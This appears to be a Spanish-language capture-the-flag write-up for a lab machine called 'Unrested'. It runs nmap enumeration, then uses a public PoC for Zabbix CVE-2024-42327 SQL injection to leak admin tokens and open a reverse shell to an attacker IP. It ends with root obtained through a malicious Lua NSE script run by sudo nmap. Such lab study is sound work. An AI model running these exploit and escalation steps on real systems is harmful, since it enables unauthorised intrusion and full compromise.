Unrested

---

---

Enumeración:

PORT      STATE SERVICE             VERSION
22/tcp    open  ssh                 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp    open  http                Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.52 (Ubuntu)
10050/tcp open  tcpwrapped
10051/tcp open  ssl/zabbix-trapper?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 13 06:11:47 2025 -- 1 IP address (1 host up) scanned in 42.94 seconds

---

Obtuvimos la página del panel de control. La versión de Zabbix se puede ver como 7.0.0. Al buscar en la web, encontramos dos vulnerabilidades. CVE-2024-36467y CVE-2024-42327.

Buscamos un poc

Este me sirvio para este caso:

GitHub - 874anthony/CVE-2024-42327_Zabbix_SQLi: This is for educational porpuses only. Please do not use agains unathorized systems.GitHub

Primero sacamos el token del admin:

python3 sqliZabbix.py -u http://10.10.11.50/zabbix/ -U matthew -p 96qzn0h2e1k3 --mode leak-tokens

[+] Authenticated successfully. Grabbing the auth token
[+] Found session tokens in the database, leaking them now...
userid: 1, token: 2a2c84306406ea6675744b8633d7e285
userid: 3, token: bac063d92f95db23c9d2e2f46c009f82
userid: 3, token: 0b1dcba7dcdb55cf56906d2fb7704b66
userid: 3, token: 5698acb9b371209d8498426ed1cc25f2
userid: 3, token: 9ad6f8c31a318a6ddd4faf0192783994
userid: 3, token: c74b28b68b1fc8e4d641b6033a7cdd0c
userid: 3, token: 2a058eae7035730a887c29d1b31cb1bf
[+] Finished

Nos mandamos una revershell con el token dado:

❯ python3 sqliZabbix.py -u http://10.10.11.50/zabbix/ \
  -U matthew -p 96qzn0h2e1k3 \
  --admin_token 2a2c84306406ea6675744b8633d7e285 \
  --ip 10.10.16.10 \
  --port 9001 \
  --mode rce

---

Escalada de privilegios

---

Por: /usr/bin/nmap

Matching Defaults entries for zabbix on unrested:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User zabbix may run the following commands on unrested:
    (ALL : ALL) NOPASSWD: /usr/bin/nmap *

• Creas el archivo NSE malicioso:

  echo 'os.execute("/bin/bash -p")' > nse_main.lua

Esto crea un script de Lua que Nmap ejecutará. os.execute("/bin/bash -p") lanza un shell preservando privilegios (-p), por lo tanto: root.

• Ejecutas Nmap con privilegios elevados:

  sudo /usr/bin/nmap -sC --datadir=/tmp

  • sudo: lo corre como root

  • -sC: indica usar los scripts por defecto

  • --datadir=/tmp: hace que Nmap busque scripts NSE en /tmp, donde tú pusiste el archivo malicioso.

• Nmap carga y ejecuta tu nse_main.lua como parte de los scripts por defecto.

  • Internamente, Nmap ejecuta el contenido del .lua, lo que lanza una shell root.

• Luego tú usas comandos como id, cd, cat, y confirmas que tienes root:

  uid=0(root) gid=0(root) groups=0(root)
  cat /root/root.txt

---